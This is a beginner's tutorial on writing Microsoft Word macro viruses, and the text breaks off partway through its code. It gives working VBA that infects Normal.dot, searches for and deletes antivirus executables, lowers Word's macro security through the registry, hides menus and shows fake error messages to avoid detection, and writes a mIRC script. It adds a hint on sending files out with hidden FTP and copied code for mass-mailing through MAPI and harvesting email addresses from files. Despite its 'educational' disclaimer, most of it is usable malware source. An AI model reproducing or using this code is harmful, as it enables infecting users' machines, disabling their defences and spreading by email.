xde's neophyte guide to Macro programming
Index:>
A)Disclaimer
B)Introduction
C)What is a Macro Virus?/How It Works
D)Macro and statistics
E)Terms to know
F)Catching and Debugging one
X)Getting down to the code
1.)Implementing Stealth Techniques
2.)Registry Codes for use in Macro's
D)Your first Mini-Macro virus
E)Sending Email using MAPI
Q)Conclusion & Notes
-------------------------------------
8********************************8
8*********(Disclaimer)***********8
8********************************8
This is an educational document, i take no responsibility for what use the
information in this document is used for. I am unable to be blamed for any
troubles you get into with the police, FBI, or any other department. Viruses
are illegal to be spread, so this is simply for theoretical purposes or
testing
in a controlled envirnment. It is not illegal to write viruses, but it is
illegal
to spread them- something i do not condone and take responsibility for.
-------------------------------------
8********************************8
8*********(Introduction)*********8
8********************************8
In this article/tutorial or whatever you want to call it- my aim is to
educate
those who want to be educated in the area of Macro viruses. It is for the
neophyte
but i do hope the already educated can learn something from it. I do this in
hope
that i will succeed. As said in the disclaimer, i take no responsibility for
what happens to you if this article does educate you (yay!) and you use it
for
illegal purposes. This article is an assimilation of everything i have read
and learned
within the time i have been researching macro viruses. Now lets continue!
-------------------------------------
8**************************************8
8*******(What is a Macro Virus?)*******8
8**************************************8
A Macro virus is created using a Macro programming language, usually
Microsoft Word
2000, or Word97. Word 97 is better to create Macro viruses in because of the
way
it is setup to catch macros. But we will go into that in section G). Macro
viruses
take advantage of Microsofts Visual Basic for Applications. The Macro virus
(which from here on out will be referred to as MV cuz i don't want to write
it
a whole bunch of times) then attaches itself to the document or template.
(It is
usually attached to Normal.dot, but we will also go over that in section G))
It works in this function: The document is opened, the MV is set to infect
on Open,
It infects it, saves the infection to the default template, then when
another document
is opened it automatically infects that document as well.**Addition: The
template
file that is infected is the Normal.dot -> which is the global template for
word. It
does this using the FileSaveAs or Document_Open command, that way it infects
all
documents**
-------------------------------------
8****************************************8
8********(Macro and Statistics)**********8
8****************************************8
The first MV (to my knowledge) was WM.Concept , WM standing for Word Macro,
(you will need to know this if you want to find sources of WMV (Word Macro
Viruses)
This viruses first started in 1994, and at the end of 1955 Macro viruses for
Word
and Accel were becoming more and more popular.
Below is a small informer of how the popularity of Macro viruses took over
the net
and fell back down, etc.
1995 - Less than 10%
1996 - About 25%
1997 - About 55%
1998 - About 62%
1999 - 80%
2000 - About 51% (An odd drop, MV's getting less common?)
2001 - About 30%
Well, from the small informer above you can tell that MV's had their peak at
bout
1999 and are decreasing.. rapidly rather. So i figure either people are
getting more
interested in ASM viruses, Macro viruses are simply being produced less due
to lack
of knowledge, or they are simply getting easier to defend against.
-------------------------------------
8*********************************8
8********(Terms to know)**********8
8*********************************8
Ok, before we continue any further in this tutorial, you have to know a few
terms
in the virii industry. Below are terms that should better educate you in the
area
of viruses and the types.
vx = Virus eXchange (people who trade viruses)
VCK = Virus Construction Kit (yes they do exist)
AV = AntiVirus (the software to catch the viruses)
Worm = Is a computer program that spreads working copies of itself to other
computer
systems (usually through Outlook)
Boot Sector Viruses = This kind of virus infects the hard disk or floppy.
When the
computer boots, the virus is ran along with the rest of the programs on your
computer
-the virus can then load itself into memory in which it replicates infecting
the
boot sectors of the floppy, etc.
Trojan = Allows you to remotely connect to a computer and control it without
the
administrator of the computer to notice. Also known as RAT.
File Infector = Attaches itself to files and infects. (Usually attaches to
EXE's,
batch's, sys's, COM's, etc.)
Dropper = a program that has been modified or specifically created to
drop(place) a
virus onto the user computer system.
Stealth Virus = (kind of obvious) even though it is running, it is 'hidden'
to the
unsuspecting user.
Polymorphic = One that creates altered forms of itself which make it more
difficult
to crack down on the virus (with AV at least)
Fast Infection = Fast is when it infects all opened documents.
Payload = The specific time set for when the main procedure of the virus
goes off.
This is usually the most damaging part of the virus.
Tunneling Virus = one that finds the interrupters and calls them.
ANSI Bomb = When the user hits a specific character, or series of
characters- whatever
payload you have set will activiate. (Eg. You hit space, and they lose all
.exe's)
Resident Infection = Places itself somewhere in the Random Access Memory
(RAM)
BSI = Boot Sector Infection
DBS = DOS Boot Sector
MBR = Master Boot Record
RAM = Random Access Memory
TSR = Terminate but Stay Resident
Now hopefully all of the above has helped you in your quest for knowledge!
-------------------------------------
8**********************************************8
8*********(Catching and Debugging one)*********8
8**********************************************8
Alright, well there are always ways to catch a virus. So in this section
(which will
be rather small) i will explain how to catch and know if you are infected by
a MV.
As a first note- the best version of word to use for MV programming is
Word97. The
reason will be pointed out as i explain how to catch and debug(view source,
etc) of
the MV. Ok, we will start with knowing you are infected. There are the
obvious ways
of MV error messages- or if it is a "stealth" MV- then you can search for
Normal.dot
If Normal.dot is around 40kb in size, than you know it has been modified-
and chances
are you have been infected by a MV. Usually if you open up your exe in a hex
editor
and search around you can see some of the source. I have not tried to edit
it within
the hex editor, but i am sure it is possible. Ok, now to catch and view a
MV. Say
you get a MV- and you want to see it's source. In Word97, if you open the
document
and try to go into the VBA Editor it will popup a screen (or it may do it on
default)
and it will say something like- warning, Macro's are in this document-
Disable?
Click yes. Now you can go and view the source of the macro without being
infected.
Word97 is a better editor because of this- It has the Disable macro screen,
where
Word2000 simply tells you that you have macro's and gives no means (to my
knowledge
at least) of deactivation. Now on to the next section!
-------------------------------------
8****************************************8
8*******(Getting down to the code)*******8
8****************************************8
Ok, so we have a generally good background, now lets down to learning the
actual
code! In MV programming there are the basic functions. They are as follows:
Document_Open() - These commands infect on the opening of the document.
Document_New() - Infects on any new document
Document_Close() - Infects when any document is closed
FileSaveAs() - Infects when the action Save As is run
FileSave() - Infects when user saves
ToolsSpelling() - Infects on spell check
ToolsGrammar() - Infects on grammar check
AutoExec() - When the document is opened (specially used for the template)
AutoExit - When the document is closed (Sepcially used for the template)
ViewVBCode() - Basically what the title says- this is mainly good for
stealth
ToolsMacro() - same idea as ViewVBCode, good for stealth
FileTemplates() - Also the same, good for stealth.
Shell "command.com /whatever you want", vbHide
^^The above is to execute things in DOS, the vbHide hides the DOS window
so the
user is unaware anything is going on.
You may be wondering how this could be helpful, well say you want to get a
file then
send it to yourself... well you can go
Shell "command.com /c ftp.exe", vbHide
And it would run the FTP program, i will let you go and figure out how to do
the
rest =]
Above are the list of most commonly used functions in MV's for infection.
When coding
them, each thing should have a Sub in front of it and end with End Sub.
Lets do an example:
Sub Document_New()
msgbox "x11011110x"
End Sub
Put that into your VBA and run the macro, then create a new document and
watch the
message box popup!
Ok, so that was a kiddy thing- but we need to start somewhere. A nice place
to look
for new code or if you need help is the help file itself. Anyways, lets try
to do
something a bit more skilled, lets open a file and then write to it. But
wait!
Before we do, i forgot to tell you to always have "On Error Resume
Next"(without the
quotes) at the beginning of every sub you do. Now lets do another example:
Sub Document_Open()
On Error Resume Next 'Always have this at the beginning of a sub
Open "C:\xde.txt" For Output As #1 'this opens/creates a file called xde.txt
in C:
Print #1, "x11011110x" 'this print x11011110x to the file
Close #1 'this closes the file we opened, you want this
Msgbox "File Written to" 'pops this message up
Yay! We just made a more advanced program and it can help you with your MV's
too!
Ok, so far we know all of the most commonly used macro functions/subs, we
know to
always use On Error Resume Next -we know how to open/create and then
write to
a file. What more do i need to know now?! Well, a lot =] Which is why we
should move
to the next section!
-------------------------------------
8***********************************************8
8*******(Implementing Stealth Techniques)*******8
8***********************************************8
Ok, to start this section off- there are many ways you can use stealth
techniques,
but i am just covering the ones that i know of and have learned from
countless
documents and MV's i've viewed. There are 4 types of ST's (Stealth
Techniques)
At least- to my belief there are:
1)AV Deletion
2)Error Messages
3)Toolbar/etc. Disabling
4)Registry
We will go over each in the order provided above. Since AV deletion is
first, let us
start there! Now, we all know the most popular AV's (McAfee, Norton, etc.)
so let's
go and make a small piece of code that will go- find the .exe, then delete
it.
Then pow! No more AV! What i found lacking in a lot of viruses/documents on
MV's was
the fact that a lot of people always assumed it was in the default
directory. Which
is why i provide a search function. Now, it took me some time to figure out
how to
get the file path after the search was done- I was looking in the windows
help for
WordVBA but was still having difficulty, if it weren't for a friend at BSRF
who helped
me figure it out- then, well, we wouldn't have the benefit =].
Sub Mainz()
Set Fs = Application.FileSearch 'Sets FS to the Filesearch application
es$ = "xdez.txt" 'defines es$ to xdez.txt
With Fs 'command so you don't have to type Fs. bla bla
.LookIn = "C:\" 'specifies the drive/or folder
.SearchSubFolders = True 'tells it to search everything in the
drive/folder
.FileName = es$ 'this is the filename it looks for, es$
If .Execute > 0 Then 'if its found, execute below
MsgBox "File Found" 'Tell us its found
Set ds = CreateObject("Scripting.FileSystemObject") 'This creates FSO
object
Set fy = ds.GetFile(es$) 'this allows us to get the filepath
h = (fy.Path) 'this assigns the file path to a variable
SetAttr h, vbNormal 'sets the attribute of the file to normal
Kill (h) 'deletes the file
MsgBox "File Illimenated" 'informs us of deletion
Else
MsgBox "File was not found." 'tells us the file wasn't found
End If 'Ends our If .Execute statement
End With 'ends our With Fs statement
End Sub 'Ends program
Ok, i can understand the above might be a bit confusing, and the MsgBox's
are for
debugging purposes. Let's go over some of the parts of code that might be a
bit more
complicated.
Firslty, you may be wondering why i put something like fy for the variable
name. I did
this so the virus would be more difficult to be located by an AV.
Continuing:
Set ds = CreateObject("Scripting.FileSystemObject")
This line is what allows us to get the file path, it creats the script
object for
use in the macro. We can see it used when we do: Set fy = ds.GetFile(es$)
Ok. That line of code works like this: File Operator.GetFile(filespec)
In this case, the file operator is defined in ds, so its:
ds.GetFile(filespec) since
our file spec is defined in es$ we have the total line of: ds.GetFile(es$)
The next line(s) that may have confused you is the h = (fy.Path) <==This
simply
sets h to the file path. (Eg. C:\My Documents\xdez.txt)
So when we do, SetAttr h, vbNormal.
It is technically doing: SetAttr "C:\My Documents\xdez.txt", vbNormal
Which sets the attribute of that file to normal (and for our benifit, makes
it
delete able. Which explains the next line: Kill (h) which can be looked at
as,
Kill ("C:\My Documents\xdez.txt")
In other words, Delete the file that was found at that path. Now here is the
full code
without the debug things (so people don't know whats actually going on.
Sub Mainz()
On Error Resume Next 'always have this!
Set Fs = Application.FileSearch
es$ = "xdez.txt"
With Fs
.LookIn = "C:\"
.SearchSubFolders = True
.FileName = es$
If .Execute > 0 Then
Set ds = CreateObject("Scripting.FileSystemObject")
Set fy = ds.GetFile(es$)
h = (fy.Path)
SetAttr h, vbNormal
Kill (h)
Else
End If
End With
End Sub
Wait! There was something new! Ok, this isn't hard to understand, the
On Error Resume Next simply says to ignore all errors in the program and
keep going.
We want this and always use this in the programming of MV's!
You may be thinking, ok, great, so i know how to find a file then delete it,
but how
do i use that. Well, get some AV software- install it- figure out what you
want to
delete- then specify that in the place of es$. So instead of es$ =
"xdez.txt" it would
be es$ = "Norton.exe" or whatever. Ok, so thats the basic way to delete
the AV-
although what if they reinstall it? Then you can simply make the script open
the
autoexec.bat and have the .bat check to see if it is installed, and if it is
delete it.
Since we covered opening and writing to a file earlier- you should be able
to do what
was said above.
2)Error Messages
Well, one way to prevent detection is to popup error messages or things of
the sort
when users try to access your macro, or close the document, or whatever.
Make the error
seem common, otherwise the user will notice it.
Ok, so lets say when the person tries to go and view your code... hah! They
can't
because of our nice little protection/stealth error. It would work something
like:
Sub ViewCode()
MsgBox "Not enough memory", 16
End Sub
^Taken from LineZer0^
Ok, so we had the message box, all we did was add the type of popup. It just
happens
that 16 is the popup for critical. Here are the value's of the popups And
here is
one more example:
MsgBox "This program has performed an illegal operation and will be shut
down.", vbCritical, "Microsoft Word"
Criticals:
16 - Critical
18 - Abort/Ignore/Retry
19 - Yes/No/Cancel
20 - Yes/No
21 - Retry/Cancel
Standard
1 - Ok/Cancel
2 - Abort/Ignore/Retry
3 - Yes/No/Cancel
4 - Yes/No
5 - Retry/Cancel
All these can also be placed using the test phrases as well.
Eg. For informational error it would be: MsgBox "Not Enough Memory",
vbInformation
For an exclamation point, it would be: MsgBox "Not Enough Memory",
vbExclamation
That sums up the Error message area, wasn't to difficult eh? Great! Now we
go to the
next section.
3)Disabling Toolbars, etc..
In Word, there are lots of toolbars, such that allow you to see the status
of the
program, macro, etc. So what we do is disable them =]
Ok, firstly, we want to disable the use of changing the security of the
macro once
ours infects. We can do this with the following line:
CommandBars("Macro").Controls("Security...").Enabled = 0
**The next line disables the macro button:
CommandBars("Macro").Controls("Macros...").Enabled = 0
As for the rest of these im going to put below most of them are pretty
straight forward.
As for 0, you can also just put False, or instead of enable, you can put
.Delete but
that is a bit more noticeable. (If the user is now lacking a lot of buttons
=] )
CommandBars("Tools").Controls("Customize...").Enabled = False
CommandBars("View").Controls("Toolbars").Enabled = False
CommandBars("View").Controls("Status Bar").Enabled = False
CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = False
CommandBars("Format").Controls("Style...").Enabled = False
Above we had it removing the statusbar, we did this because the program
tracks certain
operations in the status bar- so with it removed we are less likely to be
noticed.
On another note, in your virus when you need to save something or you don't
want the
user to be prompted to have his document saved eventhough he made edits- you
can use
the following code- These commands tell Word that the document has already
been saved,
so it won't prompt you.
NormalTemplate.Saved = True
ActiveDocument.Saved = True
Below only works in Word97 (As far as i can understand). What it does is
disables the
prompt of - would you like to activate macro's? -. So your macro will
automatically
run without the prompt.
Options.VirusProtection = False
Another useful one is disabling the cancel key, im sure you can imagine how
this is
helpful.
Application.EnableCancelKey = wdCancelDisabled
Application.ScreenUpdating = False 'this one is rather straightforward.
4)Registry security disabling.
Well, i don't know a lot of these, so here is the one i do know.
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") =
1&
Basically what this does it set the macro security of Word to the lowest so
our macro's
will execute.
************(Getting down to the code>>Section Two.)************8
Registry Codes for use in Macro's*******************************8
****************************************************************8
All the registry codes below were taken from LineZer0 Zine.
Hides all drives in My Computer:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
Nodrives = 3
Disables Adding Printers:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
NoAddPrinter = 1
Sub folders at start-programs will be disabled.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
NoStartMenuSubFolders = 1
All items on desktop will be hidden:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
NoDesktop = 1
Message box will appear on start
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon
LegalNoticeCaption = Text
LegalNoticeText = Text
**A few additions by mio:
Gets rid of the shutdown button:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
"NoCloseKey" = "1"
You can set the Source Directory of windows:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath
"WinDir"="C:\Windows\"
I haven't tried this one yet- but i think it will make the connect screen
appear
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]
"LoadPowerProfile"="Rundll32.exe powrprof.dll,LoadCurrentPwrScheme"
"TrueVector"="C:\WINDOWS\SYSTEM\ZONELABS\VSMON.EXE -service"
"MiniLog"="C:\\WINDOWS\SYSTEM\ZONELABS\MINILOG.EXE -service"
This disables the Recent Documents folder in the start menu. (In case you
have some
program you wanted to run but it would be caught cuz of it)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRecentDocsMenu"="1"
Gets rid of the task bar:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoTaskbar"=dword:00000000
Gets rid of network neighborhood:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoNetHood"=dword:00000000
Removes Recent Document system folder from the Start Menu:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRecentDocsHistory"=dword:0
Removes Control Panel from being displayed
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NODispCPL"=dword:00000000
Ok, well that's all of them. Yay!
-------------------------------------
8**********************************************8
8*********(Your first mini-Macro Virus)********8
8**********************************************8
In this section, we will go over all the basics of what we have learned so
far. The
mini-macro virus we are going to make is going to be a MV ro mIRC virus. It
won't
be anything really fancy and exciting- just enough to go over all the basics
of what
we have talked about so far. Now let's start!
Ok, so here is the file proccess.
The person runs word.
-When the document is closed, the infection takes place.
-checks to see if script.ini for mIRC exists.
-if it does, it adds our little script part to it else ends
-now that the script is added, the program is complete
-end program ->
Sub Document_Close()
On Error Resume Next
'Security part of the MV
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") =
1&
CommandBars("Macro").Controls("Security...").Enabled = 0
CommandBars("Macro").Controls("Macros...").Enabled = 0
CommandBars("Tools").Controls("Customize...").Enabled = 0
CommandBars("View").Controls("Toolbars").Enabled = 0
CommandBars("View").Controls("Status Bar").Enabled = 0
CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = 0
CommandBars("Format").Controls("Style...").Enabled = 0
Application.ScreenUpdating = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
Options.VirusProtection = False
'I learned the below from Lord Arz which is why the code is quite familiar
'although a lot of Virus writers like to import there virus which they
export in the
'beginning
Miniv = ActiveDocument.FullName 'sets Miniv as the current document
Hit = NormalTemplate.Name 'Hit is the Normal.dot (what we want to infect)
If ThisDocument.Name = "Normal.dot" OR "Normal.Dot" Then 'If either name
matches
Miniv = Hit 'Then they = eachother
Application.OrganizerCopy Miniv, Hit, "Mini-Virus",
wdOrginizerObjectProjectItems
'^This is the function for copying local VBA's while word is running.
'Miniv is our source, Hit is where its copying to, "Mini-Virus" is the name,
'wdOrginizerObjectProjectItems is the object to copy the items in our
project.
'Here is the part where it checks if the file exists
infe$ = "c:\mirc\script.ini" 'sets the path for easier re-use
Set fs = CreateObject("Scripting.FileSystemObject") 'creates the FSO object
If fs.FileExists(infe$) Then GoTo mircwrite Else GoTo fling
'^ If the file exists, goto mircwrite, if it doesn't, go to fling
mircwrite:
Open "c:\mirc\script.ini" For Output As #1 'opens the file
Print #1, "[Script]" 'writes
Print #1, "n0;Miniscript" 'writes
Print #1, "n1= ON 1:JOIN:#:{ /exit } " 'writes
Print #1, "n2= ON 1:*xde*:#:{ /exit };" 'writes
Close #1 'closes the file (we always want this)
SetAttr "c:\mirc\script.ini", vbReadOnly
'^sets it so no one else can write to it.
GoTo finish 'goes to finish
fling:
MsgBox "Invalid Memory Space", vbCritical 'Warning message
finish:
End Sub
Sub Document_Open()
CommandBars("Macro").Controls("Security...").Enabled = 0
CommandBars("Macro").Controls("Macros...").Enabled = 0
CommandBars("Tools").Controls("Customize...").Enabled = 0
CommandBars("View").Controls("Toolbars").Enabled = 0
CommandBars("View").Controls("Status Bar").Enabled = 0
CommandBars("Tools").Controls("Templates and Add-Ins...").Enabled = 0
CommandBars("Format").Controls("Style...").Enabled = 0
Application.ScreenUpdating = False
Application.DisplayStatusBar = False
Application.DisplayAlerts = False
Options.VirusProtection = False
'just kinds of redoes everything making sure our virus isn't located
End Sub
Sub ViewVBCode()
MsgBox "Invalid Memory Space", vbCritical 'Warning message
End Sub
Sub ToolsMacro()
MsgBox "Invalid Memory Space", vbCritical 'Warning message
End Sub
Sub FileTemplates()
MsgBox "Invalid Memory Space", vbCritical 'Warning message
End Sub
Ok, thats our mini virus! But before i let you go off and start your own
things, you
may want to take a quick look below.
Most virus writers use a different method of infection. This method looks
something
along the lines of:
If ThisDocument.Name = "normal.dot" Or "Normal.Dot" Then
For i=1 to ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(i).Name="Virus name" Then
Goto Destination
Next i
This is a For...next loop. What we are doing is taking i, setting it to the
value of 1
then having it add 1 to I until it reaches the number that .Count is at (the
number
of active documents, im assuming).
Then, inside the loop it is using an If...Else statement (if this happens do
this,
otherwise do this) which says- If one of the projects has the title of
"Virus name"
(Virus name being the name of your virus) then GOTO the mark. Whats this
GOTO stuff!?
You never talked about it! GOTO is simply, GOTO is simply a 'mark' if you
will- in the
program. To imply text as a 'mark' in the program, simply put the text then
a :
For example:
Sub AutoExit()
Msgbox "x11011110x"
Goto ending
'whatever code would be here
ending:
End Sub
ending: is your mark, GOTO says go to ending:
For i=1 to NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name="Virus name" Then
Goto Destination
Next i
This is basically the same as the above, except it is referring to the
templates now-
insuring that you infect the right template (is my guess). As i said before,
Virus
writers use this a lot- so it is good to understand it.
-------------------------------------
8**********************************************8
8**********(Sending Email Using MAPI)**********8
8**********************************************8
I didn't write this part, i found it on a site and thought it would be
helpful
so i thought i would add it to this document since Sending viruses via email
is
important. I take no credit for this guys work, and i did not alter his
document which
is below what so ever:
Macroviruses and Internet
This article is designated for those coderz thinking of writing macroviruses
taking advantage of new internet technologies.
I will discuss how to:
send e-mail using MAPI win32api
download plugin using undocumented function winapi DoFileDownload
search for e-mail adresses in files
Sending e-mail using MAPI win32api
This is siplme example of sending e-mail using MAPI API. We will use
MAPILogOn, MAPISendMail, MAPILogoff functions to solve our task. This code
(procedure) send e-mail with text message of your choice.
Public Const MAPI_AB_NOMODIFY = &H400
Public Const MAPI_BCC = 3
Public Const MAPI_BODY_AS_FILE = &H200
Public Const MAPI_CC = 2
Public Const MAPI_DIALOG = &H8
Public Const MAPI_E_AMBIGUOUS_RECIPIENT = 21
Public Const MAPI_E_AMBIG_RECIP = MAPI_E_AMBIGUOUS_RECIPIENT
Public Const MAPI_E_ATTACHMENT_NOT_FOUND = 11
Public Const MAPI_E_ATTACHMENT_OPEN_FAILURE = 12
Public Const MAPI_E_ATTACHMENT_WRITE_FAILURE = 13
Public Const MAPI_E_BAD_RECIPTYPE = 15
Public Const MAPI_E_BLK_TOO_SMALL = 6
Public Const MAPI_E_DISK_FULL = 4
Public Const MAPI_E_FAILURE = 2
Public Const MAPI_E_INSUFFICIENT_MEMORY = 5
Public Const MAPI_E_INVALID_EDITFIELDS = 24
Public Const MAPI_E_INVALID_MESSAGE = 17
Public Const MAPI_E_INVALID_RECIPS = 25
Public Const MAPI_E_INVALID_SESSION = 19
Public Const MAPI_E_LOGIN_FAILURE = 3
Public Const MAPI_E_LOGON_FAILURE = MAPI_E_LOGIN_FAILURE
Public Const MAPI_E_MESSAGE_IN_USE = 22
Public Const MAPI_E_NETWORK_FAILURE = 23
Public Const MAPI_E_NO_MESSAGES = 16
Public Const MAPI_E_NOT_SUPPORTED = 26
Public Const MAPI_E_TEXT_TOO_LARGE = 18
Public Const MAPI_E_TOO_MANY_FILES = 9
Public Const MAPI_E_TOO_MANY_RECIPIENTS = 10
Public Const MAPI_E_TOO_MANY_SESSIONS = 8
Public Const MAPI_E_TYPE_NOT_SUPPORTED = 20
Public Const MAPI_E_UNKNOWN_RECIPIENT = 14
Public Const MAPI_ENVELOPE_ONLY = &H40
Public Const MAPI_FORCE_DOWNLOAD = &H1000
Public Const MAPI_GUARANTEE_FIFO = &H100
Public Const MAPI_LOGOFF_SHARED = &H1
Public Const MAPI_LOGOFF_UI = &H2
Public Const MAPI_LOGON_UI = &H1
Public Const MAPI_NEW_SESSION = &H2
Public Const MAPI_OLE = &H1
Public Const MAPI_OLE_STATIC = &H2
Public Const MAPI_ORIG = 0
Public Const MAPI_PEEK = &H80
Public Const MAPI_RECEIPT_REQUESTED = &H2
Public Const MAPI_SENT = &H4
Public Const MAPI_SUPPRESS_ATTACH = &H800
Public Const MAPI_TO = 1
Public Const MAPI_UNREAD = &H1
Public Const MAPI_UNREAD_ONLY = &H20
Public Const MAPI_USER_ABORT = 1
Public Const MAPI_E_USER_ABORT = MAPI_USER_ABORT
Public Const SUCCESS_SUCCESS = 0
'-- mapi message recipient object type
Public Type MapiRecip
Reserved As Long
RecipClass As Long
Name As String
Address As String
EIDSize As Long
EntryID As String
End Type
'-- mapi message file object type
Public Type MapiFile
Reserved As Long
Flags As Long
Position As Long
PathName As String
FileName As String
FileType As String
End Type
'-- mapi message object type
Public Type MAPIMessage
Reserved As Long
Subject As String
NoteText As String
MessageType As String
DateReceived As String
ConversationID As String
Flags As Long
RecipCount As Long
FileCount As Long
End Type
Public Declare Function MAPILogoff Lib "MAPI32.DLL" (ByVal Session&, _
ByVal UIParam&, ByVal Flags&, _
ByVal Reserved&) As Long
Public Declare Function MAPILogon Lib "MAPI32.DLL" (ByVal UIParam&,_
ByVal User$, ByVal Password$, _
ByVal Flags&, ByVal Reserved&,_
Session&) As Long
Public Declare Function MAPISendMail Lib "MAPI32.DLL" Alias _
"BMAPISendMail" (ByVal Session&,
ByVal _
UIParam&, Message As MAPIMessage, _
Recipient() As MapiRecip, File() As
MapiFile, _
ByVal Flags&, ByVal Reserved&) As
Long
' Mailsending procedure
' sTo - target adress (where the email should ne delivered)
' sSubject - email subject
' sMessage - message body text
Public Function api_SendMail(sTo As String, sSubject As String, sMessage As
String)
' * use api functions to send mail
'
On Error Goto suxx
Dim Rtn As Long '-- return value For api calls
Dim objMsg As MAPIMessage''-- message object
Dim objRec() As MapiRecip''-- recipient object array
Dim objFile() As MapiFile''-- file object array
Dim hMAPI As Long'-- session handle
ReDim objRec(1)
ReDim objFile(1)
'
'-=-=-=-=-=-
'file object
'-=-=-=-=-=-
'
' * default - not expecting to send a file
'
objFile.Reserved = 0
'
' * values not used
'
'objFile.Flags
'objFile.Position = -1
'objFile.PathName = "c:\mtx4ever.exe"
'objFile.FileName = 0
'objFile.FileType = 0
'
'-=-=-=-=-=-=-=-=
'recipient object
'-=-=-=-=-=-=-=-=
'
objRec(0).Reserved = 0
objRec(0).RecipClass = 1
objRec(0).Name = sTo
'
' * values not used for recipient
'
'objRec.Address
'objRec.EIDSize
'objRec.EntryID
'
'-=-=-=-=-=-=-=
'message object
'-=-=-=-=-=-=-=
'
objMsg.Reserved = 0
objMsg.Subject = sSubject ' mail subject
objMsg.RecipCount = 1
objMsg.FileCount = 0 ' how many files are in message
objMsg.NoteText = sMessage ' mail message
'
' * values not used for message
'
'objMsg.MessageType
'objMsg.DateReceived
'objMsg.ConversationID
'objMsg.Flags
' We will create a session for e-mail sending
' using standart windows password for sending emails.
' it's possible not to use MS Exchange Settings, and simply put 0 to that
option
Rtn = MAPILogon(0, "MS Exchange Settings", "", MAPI_LOGON_UI, 0, hMAPI)
' * send mail message through MAPI
Rtn = MAPISendMail(hMAPI, 0, objMsg, objRec, objFile, 0, MAPI_DIALOG)
' * logoff MAPI application
Rtn = MAPILogoff(hMAPI, 0, 0, 0)
' * close this function
Exit Function
suxx:
Msgbox "MOD_MAIL.api_SendMail()"
End Function
Search of mail adresses in files
Information
The procedure itself was written by fanous russian virus wroter
Cybershadow/SMF (and you got to my articles), I changed the code a bit and
added recurssive disk search using API functions.
Procedure description
Procedure Search
SearchPath = name of the directory (exemple SearchPath = "C:\My Documents"
FindStr = file names in which we will search (exemple FindStr = "*.*htm")
After we entered search parameters we will the procedure will search for
email adresses. If email adress has been found it will be stored in name_
paramater. You just need to add code for sending and the rest. Lot of mail
adresses can be found in "C:\windows\Temporary Internet Files". On my
computer i have found there about 300 mail adresses.
---- BAS MODULE -----------
Private Declare Function FindFirstFile Lib "kernel32" _
Alias "FindFirstFileA" _
(ByVal lpFileName As String, _
lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function FindNextFile Lib "kernel32" _
Alias "FindNextFileA" _
(ByVal hFindFile As Long, _
lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function GetFileAttributes Lib "kernel32" _
Alias "GetFileAttributesA" _
(ByVal lpFileName As String) As Long
Private Declare Function FindClose Lib "kernel32" _
(ByVal hFindFile As Long) As Long
Const MAX_PATH = 260
Const MAXDWORD = &HFFFF
Const INVALID_HANDLE_VALUE = -1
Const FILE_ATTRIBUTE_ARCHIVE = &H20
Const FILE_ATTRIBUTE_DIRECTORY = &H10
Const FILE_ATTRIBUTE_HIDDEN = &H2
Const FILE_ATTRIBUTE_NORMAL = &H80
Const FILE_ATTRIBUTE_READONLY = &H1
Const FILE_ATTRIBUTE_SYSTEM = &H4
Const FILE_ATTRIBUTE_TEMPORARY = &H100
Private Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type
Private Type WIN32_FIND_DATA
dwFileAttributes As Long
ftCreationTime As FILETIME
ftLastAccessTime As FILETIME
ftLastWriteTime As FILETIME
nFileSizeHigh As Long
nFileSizeLow As Long
dwReserved0 As Long
dwReserved1 As Long
cFileName As String * MAX_PATH
cAlternate As String * 14
End Type
Function StripNulls(OriginalStr As String) As String
If (InStr(OriginalStr, Chr(0)) > 0) Then
OriginalStr = Left(OriginalStr, _
InStr(OriginalStr, Chr(0)) - 1)
End If
StripNulls = OriginalStr
End Function
Function FindFilesAPI(path As String, _
SearchStr As String, _
FileCount As Integer, _
DirCount As Integer)
Dim FileName As String ' variable holding filename
Dim DirName As String ' variable holding subdir name
Dim dirNames() As String ' filenames buffer
Dim nDir As Integer ' number of directories in this path
Dim i As Integer ' cycle counter
Dim hSearch As Long ' search descriptor
Dim WFD As WIN32_FIND_DATA
Dim Cont As Integer
If Right(path, 1) <> "\" Then path = path & "\"
' subdirectories search
nDir = 0
ReDim dirNames(nDir)
Cont = True
hSearch = FindFirstFile(path & "*", WFD)
If hSearch <> INVALID_HANDLE_VALUE Then
Do While Cont
DirName = StripNulls(WFD.cFileName)
If (DirName <> ".") And (DirName <> "..") Then
' checking directory
If GetFileAttributes(path & DirName) And _
FILE_ATTRIBUTE_DIRECTORY Then
dirNames(nDir) = DirName
DirCount = DirCount + 1
nDir = nDir + 1
ReDim Preserve dirNames(nDir)
End If
End If
Cont = FindNextFile(hSearch, WFD)
Loop
Cont = FindClose(hSearch)
End If
hSearch = FindFirstFile(path & SearchStr, WFD)
Cont = True
If hSearch <> INVALID_HANDLE_VALUE Then
While Cont
